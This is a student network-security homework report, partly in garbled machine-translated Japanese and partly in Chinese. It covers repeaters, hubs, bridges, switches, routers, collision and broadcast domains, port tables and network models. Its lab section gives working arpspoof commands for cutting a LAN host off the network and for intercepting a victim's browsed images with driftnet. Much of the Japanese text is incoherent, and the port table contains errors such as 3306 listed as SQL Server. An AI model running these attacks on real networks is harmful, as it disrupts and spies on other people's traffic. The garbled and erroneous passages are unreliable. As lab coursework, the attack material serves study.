宿題2020年1月11日（キーワード：コンピュータネットワーク、ARPスプーフィング）

宿題

王元缶 

2020年1月11日

@雨男ネットワークセキュリティ

仕事

ジョブの開始

1.仕事の概要

• どのようにネットワーク機器を動作します
• ポート
• コンピュータネットワークモデル
• コンピュータネットワークプロトコル
• カーリーのIPアドレスの設定

2.仕事の分析

2.1ブリッジ、ルータのレイヤ2スイッチ機能との違い、ブロードキャストドメインとコリジョンドメインは、これらの作品の機器を説明します

　　よりよい各デバイス、並びにそれらの機能の違いの原則を理解するために、今すぐコンピュータネットワーク機器の概要の概要のすべてのレベルのために、物理層デバイスからの分析を開始します。

• リピータ（RPリピータ）＆ハブ（ハブ）

　　リピータ

　　1.どのようなリレーである：ネットワーク回線に接続された中継装置、及び再生信号がネットワークデバイスを減少させます。

　　2.中継の役割：信号電力線の損失の存在が徐々にしたがって、受信エラーの原因、伝送路、ある程度減衰による信号歪みに伴って減少します。リピータは、この問題とデザインを解決することです。その接続を完了するための物理回線、信号の減衰が増幅され、元のデータが同じままです。

　　3.リピータ機能：リレーがで運転される物理層のためのデバイス二つの同一のネットワーク相互接続されたネットワーク・ノード2つの一般的な言語間の双方向転送作業物理的信号。

　　4.リピーターデメリット

　　利点

• 通信距離を展開します。
• これは、ノードの最大数を増加させます。
• 各セグメントは、異なる通信速度を使用することができます。
• ネットワークに障害が発生した信頼性の向上は、一般的にのみ個々のセグメントに影響を与えます。

　　簡単なリレーの主な利点は、使いやすく、インストールするには、比較的安価である：PS。ネットワーク距離と、彼だけでなく、機能は、また、ネットワークの異なる伝送媒体に一緒に接続することができます。中継器は、物理層で動作し、高レベルのプロトコルは完全に透明です。

　　短所

• 以来、信号を受信するリピータは、送信の状態（復元）減衰再生、及び、遅延増加を転送します。
• MAC副層CANバスとフロー制御なし。ネットワーク上の場合、重負荷、リピータは、バッファメモリのオーバーフロー空間の不足に起因することができるので、失われるフレームを生成するように、発生します。
• リピータ失敗した場合、隣接する二つのサブネットの作品に影響を与えます。

　　5.リピータ「トゥルーカラー」

      

 

 図リピーター2.1

 図のリレーの図2.2応用。

　　ハブ

　　1.ハブは何か：ハブはマルチポートリピータは、純粋にハードウェアデバイスのネットワークインフラストラクチャです

　　2.ハブ機能：ハブの主な機能は、再生された受信信号整形、伝送距離を拡大するために増幅されたノード上に中心を持つクラスタ内のすべてのノードがあります。

　　3.ハブの特徴：単にビット（ハブは任意の情報信号、アドレスまたはデータを知らない）であろう各トランシーバへのインタフェースの物理層におけるハブの作業は、衝突検出を行いません。

　　4.プロセスハブ操作：ライン信号をノード放送受信信号は、ハブは、増幅後の減衰した信号を整形信号伝送ケーブルにおける信号減衰による信号ハブ、受信し、増幅し、最終的に他のすべてのポートにハブに転送。

　　5.ハブ「トゥルーカラー」

　　

 図ハブ2.3

   図ハブ構成2.4

• 橋（ブリッジ）

　　2つのLANストアアンドフォワードデバイスを接続する、ブリッジ、また橋として知られている：橋は何1。

　　2.ブリッジの役割：ブリッジフレーム転送技術は、MACパーティションブロックによれば、衝突は、それぞれのブリッジセグメントはネットワークデータリンク層において互いに接続されている、単離することができます。

　　3.ブリッジの特徴：ブリッジはネットワークが2つの類似を接続し、データリンク層で動作し、データ配信ネットワークを管理します。これは、ネットワークのパフォーマンス、信頼性、セキュリティを向上させる、ネットワークの拡張された距離または範囲であることができます。

　　4. Aブリッジ作品：既存の2つのネットワーク、すなわちネットワーク1,2。1とパケット伝送ネットワークブリッジは、受信ブリッジ接続後にネットワークを介してネットワーク2、アドレスチェックパケット、アドレスはネットワーク2のアドレス場合、逆に、それを放棄するように、ネットワーク1に属する場合には、それ2.ネットワークブリッジそのような分離に続き、ネットワークセグメントの他のユーザへの不正アクセスを防止するために、（同じネットワーク番号に属する）セグメントのネットワーク番号、安全スペーサーセグメントを複数の同一の分割、情報を利用することができます。

　　橋の長所と短所

　　利点

• フィルタのトラフィック
• 物理学の範囲を拡大
• あなたは、異なる物理層、異なる配線LANを使用することができます
• 信頼性を向上させます

　　短所

• 最初に受信したフレームのブリッジとステーションルックアップテーブルを格納し、待ち時間の増加
• いいえフロー制御機能しません
• ユーザーの数が多すぎる（これ以上の数百以上）とローカルエリアネットワークあまり大きくない、あるいは時にはそれ以上のブロードキャストストームを持っている情報の量ではないではないだけのために

　　6.橋「トゥルーカラー」

 図2.5図ブリッジ作業

• スイッチ（スイッチ）

　　電気（光）信号転送ネットワークデバイス：1.スイッチは何です。

　　2.スイッチの役割：スイッチはデータリンク層で動作し、同期データ伝送、増幅及び整形を実現することが可能であり、及びデブリは、ショートフレームをフィルタリングすることができます。衝突ドメインおよびスイッチを単離することは効果的ブロードキャストストームの発生を抑制することができます。

　　3.スイッチの動作モード：

• STPは：パケットが検出された入力ポートに、チェックパケットヘッダは、パケットの宛先アドレス取得は、内部動的ルックアップテーブルは、入力および出力データ・パケットの交点にオンされ、対応する出力ポートに変換され、開始します機能を切り替えるための各ポートを介し。
• フォワードストアと：格納されたパケットの第1の入力ポート、パケットを送信する出力ポートにルックアップテーブルを介して、CRC（巡回冗長検査）チェック、エラーパケット処理後のパケットの抽出された宛先アドレスが続きます。
• フラグメント：パケットの長さを確認してください64は、パケットが破棄され、64バイト未満の場合は、パケットの記述が虚偽である、十分にバイト、64バイト以上ならば、パケットが送信されます。

• ルーター（ルーター）

　　1.どのようなルータです：2以上のネットワークハードウェアデバイスを接続し、ネットワーク間のゲートウェイとしての役割、各パケットの読み出しアドレスを再生すると、どのように転送するには、特定のインテリジェントネットワークデバイスを決定します。

　　2.ルータの役割：ルーティングアルゴリズムを最適ルートで指定された場所の各々に選択されたパケットに係ります。

　　3.ルータ機能：ネットワーク層ルータは、典型的には、位置の異なるネットワーク間で格納され、パケット転送処理は、異なる論理ネットワークに分離することができます。

　　4.ルータの作品は：特定のIPアドレスに基づいてデータを転送します。同ネットワークでは、IPアドレスのネットワークアドレスが同じでなければなりません。通信は、あなたが他のセグメント内のコンピュータと通信したい場合、それは転送ルータを通過する必要があり、コンピュータ間で同一のネットワークアドレスとIPアドレスの間でのみ可能です。異なるネットワークアドレスのIPアドレスが直接通信することはできません、彼らは非常に接近している場合でも、我々は通信できません。複数のポートは、ルータのネットワークセグメントの複数に接続され、各ポートのIPアドレスのネットワークアドレスは、接続されたネットワークセグメントのネットワークアドレスと一致しなければなりません。異なるポートは、そのネットワークアドレスは、対応するセグメント異なる独自のセグメントのIPアドレスにルータを介してデータを送信するホストの各セグメントを作るために、異なっています。

　　5.ルータ「トゥルーカラー」

　

 

図ルータ2.6

 

 図2.7ルータの作業プロセス

• コリジョンドメイン（衝突Domian）＆ブロードキャストドメイン（ブロードキャストドメイン）

　　コリジョンドメイン

　　1.什么是冲突域：一个站点向另一个站点发出信号，除目的站点外，有多少站点能收到这个信息，这些站点就构成一个冲突域。（冲突域基于第一层，即物理层）

　　2.怎样避免冲突：对网络进行分割，分离流量并创建更小的冲突域来使用户或的更高的带宽。

　　3.冲突域“真颜”

　　

 图2.8 集线器下的冲突域

　　广播域

　　1.什么是广播域：网络中能接收任一设备发出的广播帧的所有设备的集合（广播域基于第二层，即数据链路层）

　　2.广播域“真颜”

 图2.9 交换机下的广播域

• 常见计算机设备与冲突域、广播域

计算机设备	能否隔离冲突域	能否隔离广播域
中继器	不能	不能
集线器	不能	不能
网桥	能	不能
交换机	能	不能
路由器	能	能

 

 图2.9 中继器与广播域，冲突域

 

  图2.10 集线器与广播域，冲突域

   图2.11 网桥与广播域，冲突域

   图2.12 交换机与广播域，冲突域

   图2.13 路由器与广播域，冲突域

2.2 常见端口表及其运行的服务

• 远程连接服务

Service	Port	Transport Protocol
Telnet	23（明文传输，极不安全）	TCP/UDP
SSH	22	TCP/UDP/SCTP
Windows Remote Desktop	3389	TCP

• 文件传输

Service	Port	Transport Protocol
TFTP	69	UDP
FTP	21	TCP/UDP/SCTP
SFTP	115	TCP/UDP

• E-mail

Service	Port	Port for SSL	Transport Protocol
IMAP	143	993	TCP/UDP
SMTP	25	994/465	TCP/UDP
POP3	110	995	TCP

•  Web

Service	Port	Transport Protocol
HTTP	80	TCP/UDP
HTTPS	443	TCP/UDP/SCTP
HTTP-ALT	8080	TCP/UDP

•  数据库

Service	Port	Transport Protocol
Mircrosoft SQL Server	TCP 1433	TCP/UDP
Mircrosoft SQL Server	TCP 3306	TCP/UDP/SCTP

•  VPN

Service	Port	Transport Protocol
PPTP	1723	TCP
L2TP	1701	UDP
IPSec	500/4500	UDP

•  网络

Service	Port	Transport Protocol
Whois	43	TCP/UDP
Domain Name Server	53	TCP/UDP
Network Time Protocol	123	TCP/UDP
Netbios Name Service	137/138/139	TCP/UDP
Syslog	514	UDP

 2.3 计算机网络模型架构分析

典型的OSI七层模型及分析如下图所示，包含了详细的协议解读

2.3.1 OSI七层模型

七层模型，亦称OSI（Open System Interconnection）。该模型是国际标准化组织（ISO）制定的一个用于计算机或通信系统间互联的标准体系，一般称为OSI参考模型或七层模型。

• 物理层：物理层的作用是实现相邻计算机节点之间比特流的透明传送，尽可能屏蔽掉具体传输介质和物理设备的差异。使其上面的数据链路层不必考虑网络的具体传输介质是什么。“透明传送比特流”表示经实际电路传送后的比特流没有发生变化，对传送的比特流来说，这个电路好像是看不见的。
• 数据链路层：在计算机网络中由于各种干扰的存在，物理链路是不可靠的。因此，这一层的主要功能是在物理层提供的比特流的基础上，通过差错控制、流量控制方法，使有差错的物理线路变为无差错的数据链路，即提供可靠的通过物理介质传输数据的方法。该层通常又被分为介质访问控制（MAC）和逻辑链路控制（LLC）两个子层。
• 网络层：通过路由选择算法，为报文或分组通过通信子网选择最适当的路径。该层控制数据链路层与传输层之间的信息转发，建立、维持和终止网络的连接。具体地说，数据链路层的数据在这一层被转换为数据包，然后通过路径选择、分段组合、顺序、进/出路由等控制，将信息从一个网络设备传送到另一个网络设备。
• 传输层：向用户提供可靠的端到端的差错和流量控制，保证报文的正确传输。传输层的作用是向高层屏蔽下层数据通信的细节，即向用户透明地传送报文。该层常见的协议：TCP/IP中的TCP协议、Novell网络中的SPX协议和微软的NetBIOS/NetBEUI协议。传输层提供会话层和网络层之间的传输服务，这种服务从会话层获得数据，并在必要时，对数据进行分割。然后，传输层将数据传递到网络层，并确保数据能正确无误地传送到网络层。因此，传输层负责提供两节点之间数据的可靠传送，当两节点的联系确定之后，传输层则负责监督工作。
• 会话层：向两个实体的表示层提供建立和使用连接的方法。将不同实体之间的表示层的连接称为会话。因此会话层的任务就是组织和协调两个会话进程之间的通信，并对数据交换进行管理。
• 表示层：对来自应用层的命令和数据进行解释，对各种语法赋予相应的含义，并按照一定的格式传送给会话层。其主要功能是“处理用户信息的表示问题，如编码、数据格式转换和加密解密”等。
• 应用层：直接向用户提供服务，完成用户希望在网络上完成的各种工作。它在其他6层工作的基础上，负责完成网络中应用程序与网络操作系统之间的联系，建立与结束使用者之间的联系，并完成网络用户提出的各种网络服务及应用所需的监督、管理和服务等各种协议。

2.3.2 TCP/IP四层模型

第一层：网络接口层

　　包括用于协作IP数据在已有网络介质上传输的协议。实际上TCP/IP标准并不定义与ISO数据链路层和物理层相对应的功能。相反，它定义像地址解析协议(Address Resolution Protocol,ARP)这样的协议，提供TCP/IP协议的数据结构和实际物理硬件之间的接口。

　　第二层：网间层

　　对应于OSI七层参考模型的网络层。本层包含IP协议、RIP协议(Routing Information Protocol，路由信息协议)，负责数据的包装、寻址和路由。同时还包含网间控制报文协议(Internet Control Message Protocol,ICMP)用来提供网络诊断信息。

　　第三层：传输层

　　对应于OSI七层参考模型的传输层，它提供两种端到端的通信服务。其中TCP协议(Transmission Control Protocol)提供可靠的数据流运输服务，UDP协议(Use Datagram Protocol)提供不可靠的用户数据报服务。

　　第四层：应用层

　　对应于OSI七层参考模型的应用层和表达层。因特网的应用层协议包括Finger、Whois、FTP(文件传输协议)、Gopher、HTTP(超文本传输协议)、Telent(远程终端协议)、SMTP(简单邮件传送协议)、IRC(因特网中继会话)、NNTP（网络新闻传输协议）等，

2.3.3 TCP/IP五层模型

五层模型	功能	每层功能概览
	在用户空间利用进程交互实现，为应用进程规定并提供相关通信的细节。数据单元：报文	针对每个应用的协议： 电子邮件协议->SMTP (client/server模式) 远程登录协议->TELNET (C&S模式) 文件传输协议->FTP、HTTP  (超文本协议)
	管理通信双方两节点间的数据传输，确保数据被可靠地传送到目标地址。传输单位：报文段、用户数据段	TCP：面向连接的、可靠的传输 UDP：无连接、最努力的传输
	负责地址管理与路由选择，将运输层产生的报文段加上首部封装成分组（IP数据报），选择合适的路由进行分组交换传送。 传送单位：IP数据报（分组）	ICMP、IGMP网际协议、IP协议
	负责物理层面节点间互连的数据帧传输，如物理地址寻址（MAX）、数据成帧、流量控制等   （IP数据报加首部成帧）传输单位：帧	ARP地址解析协议 帧中继
	提供传输的物理媒介，实现比特流传输。单位：比特	RJ-45、RS-232等物理接口协议

 

2.4 计算机网络各层中的协议及其功能

• 应用层: (典型设备:应用程序，如FTP，SMTP ，HTTP)

DHCP(Dynamic Host Configuration Protocol)动态主机分配协议，使用 UDP 协议工作，主要有两个用途：给内部网络或网络服务供应商自动分配 IP 地址，给用户或者内部网络管理员作为对所有计算机作中央管理的手段。实 现即插即用连网。

FTP （File Transfer Protocol）文件传输协议<端口号21>减少或消除不同操作系统下处理文件的不兼容性。

HTTP （Hypertext Transfer Protocol ）超文本传输协议 <端口号 80>， 面向事务的应用层协议

SMTP （Simple Mail Transfer Protocol ）简单邮件传输协议 <端口号25> 用于发送邮件。

RPC （Remote Procedure Call Protocol ）（RFC- 1831）远程过程调用协 议 

• 传输层: (典型设备: 进程和端口) 数据单元：数据段 （Segment）

TCP （Transmission Control Protocol ）传输控制协议提供可靠的面向连接的服务，传输数据前须先建立连接，结束后释放。可靠的全双工信道。可靠、有序、无丢失、不重复。

UDP (User Datagram Protocol ）用户数据报协议发送数据前无需建立连接，不使用拥塞控制，不保证可靠交付，最大努力交付。
网络层: (典型设备:路由器，防火墙、多层交换机) 数据单元：数据包（Packet ）

IP (IPv4 · IPv6) (Internet Protocol) 网络之间互连的协议

ARP (Address Resolution Protocol) 即地址解析协议，实现通过IP 地址得 知其物理地址。

RARP (Reverse Address Resolution Protocol)反向地址转换协议允许局域 网的物理机器从网关服务器的 ARP 表或者缓存上请求其 IP地址。

ICMP (Internet Control Message Protocol ）Internet 控制报文协议。它是TCP/IP 协议族的一个子协议，用于在IP 主机、路由器之间传递控制消息。

IGMP (Internet Group Management Protocol) Internet 组管理协议,是因特 网协议家族中的一个组播协议，用于 IP 主机向任一个直接相邻的路由器报 告他们的组成员情况。

• 数据链路层: (典型设备: 网卡，网桥，交换机) 数据单元：帧 （Frame）

PPP(Point-to-Ponit Protocol)：点对点协议面向字节，由三部分组成：一个将IP 数据报封装到串行链路的方法；一个用于建立、配置和测试数据链路连接的链路控制协议

停止等待协议
CSMA/CD(Carrrier Sense Multiple Access with Collision Detection)载波监听多点接入/碰撞检测协议。总线型网络，协议的实质是载波监听和碰撞检测。载波监听即发数据前先检测总线上是否有其他计算机在发送数据，如暂时不发数据，避免碰撞。碰撞检测为计算机边发送数据边检测信道上的信号电压大小。

ARQ（Automatic Repeat-reQuest ）自动重传请求协议，错误纠正协议之一，包括停止等待ARQ 协议和连续ARQ 协议，错误侦测、正面确认、逾时重传与负面确认继以重传等机制。

• 物理层:(典型设备：中继器，集线器、网线、HUB) 数据单元：比特 （Bit）

以太网物理层、调制解调器、PLC 、SONET/SDH 、G.709 、光导纤维、 同轴电缆、双绞线

2.5 kali如何配置静态ip地址

• 打开Kali终端

 

　　ps：要在root模式下操作

• 打开网卡的配置文件，路径是/etc/network/interfaces

vim /etc/network/interfaces。

• 对网卡进行静态ip配置
• 配置DNS相关信息

vim /etc/resolv.conf

• 重启网卡

service networking restart

2.6 学习PPT中的内容

2.6.1 ARP断网攻击

• 查看kali虚拟机当前网卡eth0 mac地址，ip地址

ifconfig

• 查看目标机的ip地址

ipconfig

 

 

•  通过fping命令，查看当前局域网还存在哪些主机，确定要攻击的主机的ip地址

fping -g 192.168.110.0/24

 

 

•  查看攻击前靶机网关的mac地址

arp -a

• 攻击前靶机能正常获取网络数据

ping 8.8.8.8 -t

• 实施断网攻击：arpspoof -i eth0 -t 192.168.110.144 192.168.110.2

arpspoof -i eth0 -t 192.168.110.144 192.168.110.2
//arpspoof -i 网卡 -t 目标ip 网关

　　靶机显示“连接超时”

 

 　　靶机的网关mac地址与攻击机相同

 

2.6.2 内网截获图片

• 设置ip流量转发，不会出现断网现象

echo 1  >/proc/sys/net/ipv4/ip_forward

• 在arp欺骗之前，检查靶机能否上网

• 进行arp欺骗

arpspoof  -i eth0 -t 192.168.110.144 192.168.110.2

• 启动drifnet工具，捕获靶机正在浏览的图片

driftnet –i eth0

• 在靶机中打开一个网页。浏览几张图片，并在kali的drifnet窗口中监看

3.思考总结

4.参考资料

• 中继器：https://baike.baidu.com/item/%E4%B8%AD%E7%BB%A7%E5%99%A8/1867747?fr=aladdin
• 集线器与中继器的区别：http://www.kokojia.com/article/25496.html
•  集线器：https://baike.baidu.com/item/%E9%9B%86%E7%BA%BF%E5%99%A8/214614?fr=aladdin
• 网桥：https://baike.baidu.com/item/%E7%BD%91%E6%A1%A5/99310?fr=aladdin
• 路由器：https://baike.baidu.com/item/%E8%B7%AF%E7%94%B1%E5%99%A8/108294?fr=aladdin
• 冲突域：https://baike.baidu.com/item/%E5%86%B2%E7%AA%81%E5%9F%9F/3536608?fr=aladdin
• https://blog.csdn.net/bobozai86/article/details/80342350
• 冲突域与广播域（区别、知识要点）：https://blog.csdn.net/lzz_646297826/article/details/53785627
• 常见的服务及端口概览：https://blog.csdn.net/RBPicsdn/article/details/85015705
• 七层模型：https://baike.baidu.com/item/%E4%B8%83%E5%B1%82%E6%A8%A1%E5%9E%8B/1441391?fr=aladdin
• OSI七层模型和TCP/IP模型对应协议（详解）：https://blog.csdn.net/qq_41923622/article/details/85805003
• 计算机网络各层协议：https://blog.csdn.net/qq_35660280/article/details/81865800